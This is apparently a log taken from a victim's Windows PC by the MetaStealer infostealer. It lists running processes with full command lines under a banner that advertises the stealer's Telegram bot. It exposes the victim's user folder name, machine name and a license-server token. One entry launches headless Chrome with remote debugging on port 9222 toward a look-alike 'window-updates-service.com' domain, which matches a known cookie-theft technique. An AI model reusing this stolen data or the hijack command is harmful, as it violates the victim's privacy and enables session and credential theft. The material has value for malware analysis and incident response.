
Process List

The document lists process IDs, names, and command lines running on the system. There are many svchost.exe and other common Windows processes as well as browsers like Chrome and Edge.

Uploaded by blackcaliber44

***********************************************

* _ _ _ _ *
* / \ / \ / \ / \ *
* ( M | E | T | A ) *
* \_/ \_/ \_/ \_/ *
* *
* Telegram: https://t.me/metastealer_bot *
***********************************************

ID: 896, Name: csrss.exe, CommandLine:


===============
ID: 1120, Name: winlogon.exe, CommandLine: winlogon.exe
===============
ID: 1272, Name: fontdrvhost.exe, CommandLine: "fontdrvhost.exe"
===============
ID: 1368, Name: dwm.exe, CommandLine: "dwm.exe"
===============
ID: 6424, Name: svchost.exe, CommandLine: C:\Windows\system32\svchost.exe -k
WspService
===============
ID: 5280, Name: ETDCtrl.exe, CommandLine: C:\Windows\system32\ETDCtrl.exe
===============
ID: 432, Name: sihost.exe, CommandLine: sihost.exe
===============
ID: 7292, Name: svchost.exe, CommandLine: C:\Windows\system32\svchost.exe -k
BthAppGroup -p -s BluetoothUserService
===============
ID: 7296, Name: svchost.exe, CommandLine: C:\Windows\system32\svchost.exe -k
UnistackSvcGroup -s CDPUserSvc
===============
ID: 7520, Name: svchost.exe, CommandLine: C:\Windows\system32\svchost.exe -k
UnistackSvcGroup -s WpnUserService
===============
ID: 7820, Name: taskhostw.exe, CommandLine: taskhostw.exe {222A245B-E637-4AE9-A93F-
A59CA119A75E}
===============
ID: 8016, Name: ctfmon.exe, CommandLine: "ctfmon.exe"
===============
ID: 7172, Name: explorer.exe, CommandLine: C:\Windows\Explorer.EXE
===============
ID: 7732, Name: igfxEMN.exe, CommandLine: "C:\Windows\System32\DriverStore\
FileRepository\cui_dch.inf_amd64_efb119a73d6b56f6\igfxEMN.exe"
===============
ID: 4988, Name: svchost.exe, CommandLine: C:\Windows\system32\svchost.exe -k
ClipboardSvcGroup -p -s cbdhsvc
===============
ID: 8692, Name: RtkAudUService64.exe, CommandLine: "C:\Windows\System32\
DriverStore\FileRepository\realtekservice.inf_amd64_844e1459fc4a4c84\
RtkAudUService64.exe" -admin
===============
ID: 8660, Name: StartMenuExperienceHost.exe, CommandLine: "C:\Windows\SystemApps\
Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\
StartMenuExperienceHost.exe" -
ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
===============
ID: 8140, Name: TextInputHost.exe, CommandLine: "C:\Windows\SystemApps\
MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -
ServerName:InputApp.AppXjd5de1g66v206tj52m9d0dtpppx4cgpn.mca
===============
ID: 9452, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 9644, Name: SearchApp.exe, CommandLine: "C:\Windows\SystemApps\
Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -
ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
===============
ID: 9952, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 10740, Name: lmgrd.exe, CommandLine: lmgrd.exe -z -c License.lic
===============
ID: 4864, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 5532, Name: SecurityHealthSystray.exe, CommandLine: "C:\Windows\System32\
SecurityHealthSystray.exe"
===============
ID: 3824, Name: RtkAudUService64.exe, CommandLine: "C:\Windows\System32\
DriverStore\FileRepository\realtekservice.inf_amd64_844e1459fc4a4c84\
RtkAudUService64.exe" -background
===============
ID: 11120, Name: adskflex.exe, CommandLine: adskflex.exe -T DESKTOP-S8Q13OL 11.18 -
1 -c ";License.lic;" -lmgrd_port 6978 -srv
uocafxNp7b0QtGj0sMJOOwFWCRIpkavm2StWMdgYsJy1EJlYAdCwgEfrieAmDuq --lmgrd_start
6440130c -vdrestart 0
===============
ID: 11132, Name: EPPCCMON.EXE, CommandLine: "C:\Program Files (x86)\EPSON Software\
Epson Printer Connection Checker\EPPCCMON.EXE"
===============
ID: 10408, Name: splwow64.exe, CommandLine: C:\Windows\splwow64.exe 8192
===============
ID: 11212, Name: E_YATIUNE.EXE, CommandLine: "C:\Windows\System32\spool\drivers\
x64\3\E_YATIUNE.EXE" /EPT "EPLTarget\P0000000000000000" /M "L3150 Series"
===============
ID: 524, Name: WINWORD.EXE, CommandLine: "C:\Program Files\Microsoft Office\Root\
Office16\WINWORD.EXE" -Embedding
===============
ID: 9256, Name: E_YATIUNE.EXE, CommandLine: "C:\Windows\System32\spool\drivers\
x64\3\E_YATIUNE.EXE" /EPT "EPLTarget\P0000000000000003" /M "L3150 Series"
===============
ID: 9760, Name: acrotray.exe, CommandLine: "C:\Program Files (x86)\Adobe\Acrobat
DC\Acrobat\AcroTray.exe"
===============
ID: 11400, Name: ai.exe, CommandLine: "C:\Program Files\Microsoft Office\root\vfs\
ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ai.exe" "6C44CBDB-D1C9-4906-BEDB-
6CAF3F34CDDF" "5D05B1A0-E313-42DF-B3B7-D0F1D358CADA" "524"
===============
ID: 11912, Name: E_YATIR4E.EXE, CommandLine: "C:\Windows\System32\spool\drivers\
x64\3\E_YATIR4E.EXE" /EPT "EPLTarget\P0000000000000002" /M "L3050 Series"
===============
ID: 11956, Name: E_YATIR4E.EXE, CommandLine: "C:\Windows\System32\spool\drivers\
x64\3\E_YATIR4E.EXE" /EPT "EPLTarget\P0000000000000004" /M "L3050 Series"
===============
ID: 11988, Name: utweb.exe, CommandLine: "C:\Users\CONSULT SOIL TESTING\AppData\
Roaming\uTorrent Web\utweb.exe" /MINIMIZED
===============
ID: 12216, Name: msedge.exe, CommandLine: "C:\Program Files (x86)\Microsoft\Edge\
Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
===============
ID: 12240, Name: msedge.exe, CommandLine: "C:\Program Files (x86)\Microsoft\Edge\
Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\CONSULT
SOIL TESTING\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-
annotation=ptype=crashpad-handler "--database=C:\Users\CONSULT SOIL TESTING\
AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\CONSULT
SOIL TESTING\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1
--annotation=channel= --annotation=chromium-version=112.0.5615.121 "--
annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --
annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --
annotation=ver=112.0.1722.48 --initial-client-
data=0x104,0x108,0x10c,0xe0,0x118,0x7ffeb29335f0,0x7ffeb2933600,0x7ffeb2933610
===============
ID: 11556, Name: msedge.exe, CommandLine: "C:\Program Files (x86)\Microsoft\Edge\
Application\msedge.exe" --type=gpu-process --gpu-
preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAA
AAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-
platform-channel-handle=2056 --field-trial-
handle=2064,i,13283826837411068617,7950193566803354289,131072 /prefetch:2
===============
ID: 11252, Name: msedge.exe, CommandLine: "C:\Program Files (x86)\Microsoft\Edge\
Application\msedge.exe" --type=utility --utility-sub-
type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-
platform-channel-handle=2304 --field-trial-
handle=2064,i,13283826837411068617,7950193566803354289,131072 /prefetch:3
===============
ID: 10228, Name: msedge.exe, CommandLine: "C:\Program Files (x86)\Microsoft\Edge\
Application\msedge.exe" --type=utility --utility-sub-
type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --
mojo-platform-channel-handle=2492 --field-trial-
handle=2064,i,13283826837411068617,7950193566803354289,131072 /prefetch:8
===============
ID: 12544, Name: Cortana.exe, CommandLine: "C:\Program Files\WindowsApps\
Microsoft.549981C3F5F10_4.2204.13303.0_x64__8wekyb3d8bbwe\Cortana.exe" -
ServerName:App.AppX2y379sjp88wjq1y80217mddj3fargf2y.mca
===============
ID: 13192, Name: CCXProcess.exe, CommandLine: "C:\Program Files\Adobe\Adobe
Creative Cloud Experience\CCXProcess.exe"
===============
ID: 13212, Name: node.exe, CommandLine: "C:\Program Files\Adobe\Adobe Creative
Cloud Experience\libs\node.exe" "C:\Program Files\Adobe\Adobe Creative Cloud
Experience\js\main.js"
===============
ID: 13304, Name: EEventManager.exe, CommandLine: "C:\Program Files (x86)\EPSON
Software\Event Manager\EEventManager.exe"
===============
ID: 12552, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 13388, Name: svchost.exe, CommandLine: C:\Windows\system32\svchost.exe -k
AarSvcGroup -p -s AarSvc
===============
ID: 13740, Name: svchost.exe, CommandLine: C:\Windows\System32\svchost.exe -k
UnistackSvcGroup
===============
ID: 13912, Name: AdobeIPCBroker.exe, CommandLine: "C:\Program Files (x86)\Common
Files\Adobe\Adobe Desktop Common\IPCBox\AdobeIPCBroker.exe" "-launchedbyvulcan-
13212 C:\Program Files\Adobe\Adobe Creative Cloud Experience\libs\node.exe"
===============
ID: 13544, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\
Application\chrome.exe"
===============
ID: 13628, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\
Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\CONSULT
SOIL TESTING\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-
annotation=ptype=crashpad-handler "--database=C:\Users\CONSULT SOIL TESTING\
AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\CONSULT
SOIL TESTING\AppData\Local\Google\Chrome\User Data"
--url=https://clients2.google.com/cr/report --annotation=channel= --
annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=109.0.5414.120 --
initial-client-
data=0x100,0x104,0x108,0xdc,0x10c,0x7ffebda76b58,0x7ffebda76b68,0x7ffebda76b78
===============
ID: 12948, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\
Application\chrome.exe" --type=gpu-process --gpu-
preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAA
AAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAA
AOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-
handle=1704 --field-trial-
handle=1884,i,1119834537848833595,4337284666919190545,131072 /prefetch:2
===============
ID: 12916, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\
Application\chrome.exe" --type=utility --utility-sub-
type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-
platform-channel-handle=2128 --field-trial-
handle=1884,i,1119834537848833595,4337284666919190545,131072 /prefetch:8
===============
ID: 12868, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\
Application\chrome.exe" --type=utility --utility-sub-
type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --
mojo-platform-channel-handle=2320 --field-trial-
handle=1884,i,1119834537848833595,4337284666919190545,131072 /prefetch:8
===============
ID: 10276, Name: ShellExperienceHost.exe, CommandLine: "C:\Windows\SystemApps\
ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -
ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
===============
ID: 9508, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 9488, Name: ApplicationFrameHost.exe, CommandLine: C:\Windows\system32\
ApplicationFrameHost.exe -Embedding
===============
ID: 14240, Name: CalculatorApp.exe, CommandLine: "C:\Program Files\WindowsApps\
Microsoft.WindowsCalculator_11.2210.0.0_x64__8wekyb3d8bbwe\CalculatorApp.exe" -
ServerName:App.AppXjvs2nbwryyqjz1h8d8v70f70g3rgdcyb.mca
===============
ID: 13624, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 14660, Name: SettingSyncHost.exe, CommandLine: C:\Windows\system32\
SettingSyncHost.exe -Embedding
===============
ID: 14812, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\
Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1.25 --
num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11
--time-ticks-at-unix-epoch=-1681920756214484 --launch-time-ticks=60786734 --mojo-
platform-channel-handle=6564 --field-trial-
handle=1884,i,1119834537848833595,4337284666919190545,131072 /prefetch:1
===============
ID: 15076, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\
Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService
--lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=7884 --
field-trial-handle=1884,i,1119834537848833595,4337284666919190545,131072
/prefetch:8
===============
ID: 15352, Name: CompPkgSrv.exe, CommandLine: C:\Windows\System32\CompPkgSrv.exe -
Embedding
===============
ID: 2312, Name: SystemSettings.exe, CommandLine: "C:\Windows\ImmersiveControlPanel\
SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel
===============
ID: 3520, Name: UserOOBEBroker.exe, CommandLine: C:\Windows\System32\oobe\
UserOOBEBroker.exe -Embedding
===============
ID: 7844, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\
Application\chrome.exe" --headless --disable-gpu --remote-debugging-port=9222
http://www.google.com.983259571923150.window-updates-service.com
===============
ID: 8012, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\
Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\CONSULT
SOIL TESTING\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-
annotation=ptype=crashpad-handler "--database=C:\Users\CONSULT SOIL TESTING\
AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\CONSULT
SOIL TESTING\AppData\Local\Google\Chrome\User Data"
--url=https://clients2.google.com/cr/report --annotation=channel= --
annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=109.0.5414.120 --
initial-client-
data=0x108,0x10c,0x110,0xe4,0x114,0x7ffebda76b58,0x7ffebda76b68,0x7ffebda76b78
===============
ID: 9200, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\
Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl
--headless --gpu-
preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAA
AAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAA
AOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-
angle=swiftshader-webgl --mojo-platform-channel-handle=1392 --field-trial-
handle=1416,i,13742419236676180750,4348982519359973086,131072 --disable-
features=PaintHolding /prefetch:2
===============
ID: 8300, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\
Application\chrome.exe" --type=utility --utility-sub-
type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --use-
angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-
handle=1596 --field-trial-
handle=1416,i,13742419236676180750,4348982519359973086,131072 --disable-
features=PaintHolding /prefetch:8
===============
ID: 14820, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\
Application\chrome.exe" --type=renderer --headless --lang=en-GB --first-renderer-
process --remote-debugging-port=9222 --allow-pre-commit-input --disable-databases
--disable-gpu-compositing --lang=en-GB --device-scale-factor=1.25 --num-raster-
threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --time-
ticks-at-unix-epoch=-1681920756215069 --launch-time-ticks=99541493 --mojo-platform-
channel-handle=2132 --field-trial-
handle=1416,i,13742419236676180750,4348982519359973086,131072 --disable-
features=PaintHolding /prefetch:1
===============
ID: 2428, Name: Creative Cloud.exe, CommandLine: "C:\Program Files\Adobe\Adobe
Creative Cloud\ACC\Creative Cloud.exe" --showwindow=false --onOSstartup=true
===============
ID: 10404, Name: Adobe Desktop Service.exe, CommandLine: "C:\Program Files (x86)\
Common Files\Adobe\Adobe Desktop Common\ADS\Adobe Desktop Service.exe" --
onOSstartup=true --showwindow=false --waitForRegistration=true
===============
ID: 3524, Name: Adobe CEF Helper.exe, CommandLine: "C:\Program Files\Common Files\
Adobe\Adobe Desktop Common\HEX\Adobe CEF Helper.exe" --type=utility --utility-sub-
type=network.mojom.NetworkService --field-trial-
handle=2288,833156078714718913,9232573452446156536,131072 --disable-
features=CalculateNativeWinOcclusion,WinUseBrowserSpellChecker --lang=en-US --
service-sandbox-type=none --no-sandbox --use-angle=swiftshader-webgl --use-gl=angle
--locales-dir-path="C:\Program Files\Common Files\Adobe\Adobe Desktop Common\CEF\
locales" --log-severity=warning --user-agent="Mozilla/5.0 (Windows NT 10.0.0;
WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
CreativeCloud/5.7.0.1307" --lang=en --user-data-dir="C:\Users\CONSULT SOIL TESTING\
AppData\Local\CEF\User Data" --log-file="C:\Users\CONSUL~1\AppData\Local\Temp\
CreativeCloud\ACC\CEF.log" --mojo-platform-channel-handle=2364 /prefetch:8
===============
ID: 4004, Name: Adobe CEF Helper.exe, CommandLine: "C:\Program Files\Common Files\
Adobe\Adobe Desktop Common\HEX\Adobe CEF Helper.exe" --type=renderer --locales-dir-
path="C:\Program Files\Common Files\Adobe\Adobe Desktop Common\CEF\locales" --log-
severity=warning --user-agent="Mozilla/5.0 (Windows NT 10.0.0; WOW64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
CreativeCloud/5.7.0.1307" --user-data-dir="C:\Users\CONSULT SOIL TESTING\AppData\
Local\CEF\User Data" --no-sandbox --autoplay-policy=no-user-gesture-required --js-
flags=--expose-gc --log-file="C:\Users\CONSUL~1\AppData\Local\Temp\CreativeCloud\
ACC\CEF.log" --field-trial-
handle=2288,833156078714718913,9232573452446156536,131072 --disable-
features=CalculateNativeWinOcclusion,WinUseBrowserSpellChecker --disable-gpu-
compositing --lang=en-US --device-scale-factor=1.25 --num-raster-threads=4 --
enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-
handle=2588 /prefetch:1
===============
ID: 15004, Name: Creative Cloud Helper.exe, CommandLine: "C:\Program Files\Adobe\
Adobe Creative Cloud\ACC\Creative Cloud Helper.exe" --remoteCoreExt=NGLWrapper --
remoteHelper=CCH_NGLW
===============
ID: 4032, Name: LockApp.exe, CommandLine: "C:\Windows\SystemApps\
Microsoft.LockApp_cw5n1h2txyewy\LockApp.exe" -
ServerName:WindowsDefaultLockScreen.AppX7y4nbzq37zn4ks9k7amqjywdat7d3j2z.mca
===============
ID: 8916, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 6272, Name: Creative Cloud Helper.exe, CommandLine: "C:\Program Files\Adobe\
Adobe Creative Cloud\ACC\Creative Cloud Helper.exe" --remoteApplet=UPI_BL --
remoteAppletInstanceID=4FA2D6C0-40BE-4D3C-8AA7-9B97B479E8D0 --remoteHelper=CCH_UPI
===============
ID: 6508, Name: CoreSync.exe, CommandLine: "C:\Program Files (x86)\Adobe\Adobe
Sync\CoreSync\CoreSync.exe"
===============
ID: 15700, Name: CCLibrary.exe, CommandLine: "C:\Program Files\Common Files\Adobe\
Creative Cloud Libraries\CCLibrary.exe"
===============
ID: 15752, Name: node.exe, CommandLine: "C:\Program Files\Common Files\Adobe\
Creative Cloud Libraries\libs\node.exe" "C:\Program Files\Common Files\Adobe\
Creative Cloud Libraries\js\server.js"
===============
ID: 772, Name: Adobe CEF Helper.exe, CommandLine: "C:\Program Files\Common Files\
Adobe\Adobe Desktop Common\HEX\Adobe CEF Helper.exe" --type=renderer --locales-dir-
path="C:\Program Files\Common Files\Adobe\Adobe Desktop Common\CEF\locales" --log-
severity=warning --user-agent="Mozilla/5.0 (Windows NT 10.0.0; WOW64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
CreativeCloud/5.7.0.1307" --user-data-dir="C:\Users\CONSULT SOIL TESTING\AppData\
Local\CEF\User Data" --no-sandbox --autoplay-policy=no-user-gesture-required --js-
flags=--expose-gc --log-file="C:\Users\CONSUL~1\AppData\Local\Temp\CreativeCloud\
ACC\CEF.log" --field-trial-
handle=2288,833156078714718913,9232573452446156536,131072 --disable-
features=CalculateNativeWinOcclusion,WinUseBrowserSpellChecker --disable-gpu-
compositing --lang=en-US --device-scale-factor=1.25 --num-raster-threads=4 --
enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-
channel-handle=3364 /prefetch:1
===============
ID: 11672, Name: msedge.exe, CommandLine: "C:\Program Files (x86)\Microsoft\Edge\
Application\msedge.exe" --type=utility --utility-sub-
type=proxy_resolver.mojom.ProxyResolverFactory --lang=en-US --service-sandbox-
type=service --mojo-platform-channel-handle=4304 --field-trial-
handle=2064,i,13283826837411068617,7950193566803354289,131072 /prefetch:8
===============
ID: 3780, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\
Application\chrome.exe" --type=utility --utility-sub-
type=proxy_resolver.mojom.ProxyResolverFactory --lang=en-US --service-sandbox-
type=service --mojo-platform-channel-handle=5420 --field-trial-
handle=1884,i,1119834537848833595,4337284666919190545,131072 /prefetch:8
===============
ID: 12996, Name: Adobe CEF Helper.exe, CommandLine: "C:\Program Files\Common Files\
Adobe\Adobe Desktop Common\HEX\Adobe CEF Helper.exe" --type=utility --utility-sub-
type=proxy_resolver.mojom.ProxyResolverFactory --field-trial-
handle=2288,833156078714718913,9232573452446156536,131072 --disable-
features=CalculateNativeWinOcclusion,WinUseBrowserSpellChecker --lang=en-US --
service-sandbox-type=proxy_resolver --no-sandbox --use-angle=swiftshader-webgl --
use-gl=angle --locales-dir-path="C:\Program Files\Common Files\Adobe\Adobe Desktop
Common\CEF\locales" --log-severity=warning --user-agent="Mozilla/5.0 (Windows NT
10.0.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81
Safari/537.36 CreativeCloud/5.7.0.1307" --lang=en --user-data-dir="C:\Users\CONSULT
SOIL TESTING\AppData\Local\CEF\User Data" --log-file="C:\Users\CONSUL~1\AppData\
Local\Temp\CreativeCloud\ACC\CEF.log" --mojo-platform-channel-handle=3980
/prefetch:8
===============
ID: 1572, Name: SearchApp.exe, CommandLine: "C:\Windows\SystemApps\
Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -
ServerName:ShellFeedsUI.AppX88fpyyrd21w8wqe62wzsjh5agex7tf1e.mca
===============
ID: 14076, Name: dllhost.exe, CommandLine: C:\Windows\system32\DllHost.exe
/Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
===============
ID: 16348, Name: SDXHelper.exe, CommandLine: "C:\Program Files\Microsoft Office\
Root\Office16\SDXHelper.exe" -Embedding
===============
ID: 13396, Name: Video.UI.exe, CommandLine: "C:\Program Files\WindowsApps\
Microsoft.ZuneVideo_10.22091.10031.0_x64__8wekyb3d8bbwe\Video.UI.exe" -
ServerName:Microsoft.ZuneVideo.AppX758ya5sqdjd98rx6z7g95nw6jy7bqx9y.mca
===============
ID: 4884, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 15504, Name: Microsoft.Photos.exe, CommandLine: "C:\Program Files\WindowsApps\
Microsoft.Windows.Photos_2022.30120.12007.0_x64__8wekyb3d8bbwe\
Microsoft.Photos.exe" -ServerName:App.AppXzst44mncqdg84v7sv6p7yznqwssy6f7f.mca
===============
ID: 2292, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 3212, Name: BridgeCommunication.exe, CommandLine: "C:\Windows\System32\
DriverStore\FileRepository\hpcustomcapcomp.inf_amd64_f0454c515430e99a\x64\
BridgeCommunication.exe" 7d81deda-1f1e-4cc9-b3c7-66344ba72df6 Global\46a5ff4c-b72f-
4222-8766-437accf142e1 1820
===============
ID: 14908, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\
Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1.25 --
num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31
--time-ticks-at-unix-epoch=-1681920756214484 --launch-time-ticks=7983848170 --mojo-
platform-channel-handle=2920 --field-trial-
handle=1884,i,1119834537848833595,4337284666919190545,131072 /prefetch:1
===============
ID: 3924, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\
Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1.25 --
num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32
--time-ticks-at-unix-epoch=-1681920756214484 --launch-time-ticks=7988413282 --mojo-
platform-channel-handle=5480 --field-trial-
handle=1884,i,1119834537848833595,4337284666919190545,131072 /prefetch:1
===============
ID: 9708, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\
Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1.25 --
num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33
--time-ticks-at-unix-epoch=-1681920756214484 --launch-time-ticks=7988903262 --mojo-
platform-channel-handle=8292 --field-trial-
handle=1884,i,1119834537848833595,4337284666919190545,131072 /prefetch:1
===============
ID: 10272, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\
Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1.25 --
num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35
--time-ticks-at-unix-epoch=-1681920756214484 --launch-time-ticks=7991790787 --mojo-
platform-channel-handle=7396 --field-trial-
handle=1884,i,1119834537848833595,4337284666919190545,131072 /prefetch:1
===============
ID: 8556, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\
Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1.25 --
num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74
--time-ticks-at-unix-epoch=-1681920756214484 --launch-time-ticks=8300793031 --mojo-
platform-channel-handle=5988 --field-trial-
handle=1884,i,1119834537848833595,4337284666919190545,131072 /prefetch:1
===============
ID: 7416, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\
Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1.25 --
num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77
--time-ticks-at-unix-epoch=-1681920756214484 --launch-time-ticks=8519766493 --mojo-
platform-channel-handle=10636 --field-trial-
handle=1884,i,1119834537848833595,4337284666919190545,131072 /prefetch:1
===============
ID: 10252, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\
Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1.25 --
num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79
--time-ticks-at-unix-epoch=-1681920756214484 --launch-time-ticks=8535202180 --mojo-
platform-channel-handle=11112 --field-trial-
handle=1884,i,1119834537848833595,4337284666919190545,131072 /prefetch:1
===============
ID: 1188, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\
Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1.25 --
num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80
--time-ticks-at-unix-epoch=-1681920756214484 --launch-time-ticks=8535782325 --mojo-
platform-channel-handle=8732 --field-trial-
handle=1884,i,1119834537848833595,4337284666919190545,131072 /prefetch:1
===============
ID: 11764, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\
Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1.25 --
num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=81
--time-ticks-at-unix-epoch=-1681920756214484 --launch-time-ticks=8538304491 --mojo-
platform-channel-handle=9104 --field-trial-
handle=1884,i,1119834537848833595,4337284666919190545,131072 /prefetch:1
===============
ID: 10172, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\
Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1.25 --
num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=83
--time-ticks-at-unix-epoch=-1681920756214484 --launch-time-ticks=8548106957 --mojo-
platform-channel-handle=10956 --field-trial-
handle=1884,i,1119834537848833595,4337284666919190545,131072 /prefetch:1
===============
ID: 3080, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\
Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1.25 --
num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=84
--time-ticks-at-unix-epoch=-1681920756214484 --launch-time-ticks=8551149755 --mojo-
platform-channel-handle=10688 --field-trial-
handle=1884,i,1119834537848833595,4337284666919190545,131072 /prefetch:1
===============
ID: 8816, Name: smartscreen.exe, CommandLine: C:\Windows\System32\smartscreen.exe -
Embedding
===============
ID: 14564, Name: WinRAR.exe, CommandLine: "C:\Program Files\WinRAR\WinRAR.exe" "C:\
Users\CONSULT SOIL TESTING\Downloads\File.7z"
===============
ID: 5936, Name: SearchProtocolHost.exe, CommandLine: "C:\Windows\system32\
SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-3280135814-
